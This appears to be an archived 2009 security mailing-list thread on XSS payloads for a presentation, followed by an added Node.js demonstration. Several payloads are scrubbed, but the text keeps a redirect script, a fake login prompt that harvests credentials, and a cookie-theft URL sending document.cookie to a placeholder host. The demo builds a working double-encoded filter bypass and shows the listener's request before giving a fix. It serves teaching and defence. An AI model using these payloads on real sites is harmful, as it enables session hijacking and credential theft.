Cool things to inject via XSS
From: trklisted at networksamurai.org (mOses)
Date: Fri, 29 May 2009 10:50:53 -0400
On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
Ok, I've got yet another presentation coming up, this time on the
OWASP Top 10 and Mutillidae. One of the things I'm going to cover is
XSS. The canonical example of course is:
but that is boring, and gives folks the impression that XSS is not
that serious. A better short example would be:
One of the more interesting challenges with web applications is the
fact that the browser supports multiple encoding types and double
Here is a SIMPLE double encode of your alert:
Hex encode the < and / tags:
Maybe you can avoid simple filtering of a single encode by
encoding the % in the '%3C':
We can go further and continue to obfuscate things and bypass more and
Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/"</script>
A little cookie Grabbing:
In addition, it's also worthwhile to note that you do not even need to
have a real running webserver on this particular http://some-ip/
The important thing to note is what the browser is understanding here.
http://some-ip/catch.php? <- this script doesn't technically need to
cookie='+ <--- this is the part that is telling the browser: hey, in the
actual URL stream, append something beyond the cookie= field.
+encodeURI(document.cookie); <- HEY, in the URI field, insert your
current cookie from this current site and send it in the raw URL.
If you have a backdoor listening shell then you will get the cookie in
a URI-encoded format showing up in your listener as a RAW HTTP request.
Or maybe a password form to make people think they have to login,
but it just grabs the credentials:
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
What are other cool things to inject, besides maybe BeEF, that show
off how XSS can be a big deal?
leveraging the browser and sending in a port scan and scanning the
network that she is on.
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
Main Web Site: http://pauldotcom.com
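As an added example, not part of the original thread, here is the double-encoding bypass and the cookie-grabbing URL discussed above worked through in Node.js. The once-decoding filter, the server that decodes twice before echoing, the location= wrapper around the thread's http://some-ip/catch.php placeholder and the sample cookie are all constructed for the demo. It goes one step beyond the thread in hex-encoding the + as well as < and /, because form-style URL decoding turns a bare + into a space and would break the string concatenation in the payload.

```javascript
// Added example (not from the original thread): a double URL-encoded XSS
// payload against a filter that decodes only once, plus the request the
// attacker's listener sees. The filter, the "decode twice" server, the
// location= wrapper and the sample cookie are constructed for this demo;
// http://some-ip/catch.php is the placeholder host used in the thread.

// Cookie-grabbing payload in the shape discussed in the thread. The original
// script tag was scrubbed from the archive, so wrapping it in location= is an
// assumption.
const PAYLOAD =
  "<script>location='http://some-ip/catch.php?cookie='+encodeURI(document.cookie)</script>";

// Form-style URL decoding as a typical server stack does it: a bare '+'
// becomes a space, then %XX sequences are decoded (PHP's urldecode() does this).
function formDecode(s) {
  return decodeURIComponent(s.replace(/\+/g, " "));
}

// Step 1 from the thread: hex-encode the angle brackets and the slash.
// Going one step further than the thread, '+' is encoded too; otherwise
// formDecode() turns it into a space and breaks the string concatenation.
function hexEncode(s) {
  return s.replace(/[<>\/+]/g, (c) =>
    "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0"));
}

// Step 2: encode the '%' itself, so %3C becomes %253C. After one round of
// decoding the parameter still reads %3C, not '<'.
function doubleEncode(s) {
  return hexEncode(s).replace(/%/g, "%25");
}

// Naive filter: blocks anything that looks like a script tag in the value
// it is handed (the once-decoded parameter).
function looksLikeScriptTag(s) {
  return /<\s*script/i.test(s);
}

// Vulnerable server: the framework decodes the query parameter once and the
// filter runs on that; the application then decodes the value a second time
// (a common mistake) and echoes it into the page unescaped.
// Returns { blocked, html } so the outcome can be checked.
function renderVulnerable(rawParam) {
  const once = formDecode(rawParam);
  if (looksLikeScriptTag(once)) return { blocked: true, html: "" };
  const twice = formDecode(once);
  return { blocked: false, html: "<p>Search results for: " + twice + "</p>" };
}

// Fixed server: decode exactly once, then HTML-escape before echoing. The
// payload is rendered as inert text however many times it was encoded.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderFixed(rawParam) {
  return "<p>Search results for: " + htmlEscape(formDecode(rawParam)) + "</p>";
}

// What shows up on the listener at some-ip once the payload runs in a
// victim's browser: the cookie, URI-encoded, in the raw request line.
// encodeURI() leaves '=' and ';' alone and turns the space into %20.
function exfilRequestLine(documentCookie) {
  return "GET /catch.php?cookie=" + encodeURI(documentCookie) + " HTTP/1.1";
}

// Demo run (the cookie value is made up).
console.log("single-encoded :", renderVulnerable(hexEncode(PAYLOAD)).blocked ? "blocked" : "rendered");
console.log("double-encoded :", renderVulnerable(doubleEncode(PAYLOAD)).blocked ? "blocked" : "rendered");
console.log("fixed server   :", renderFixed(doubleEncode(PAYLOAD)));
console.log("listener sees  :", exfilRequestLine("PHPSESSID=abc123; user=admin"));
```

The single-encoded payload is caught because the filter sees the decoded `<script`; the double-encoded one passes the filter as `%3Cscript%3E...` and only becomes a live tag on the application's second decode. The fix is not a better blacklist but decoding once and output-encoding for the HTML context.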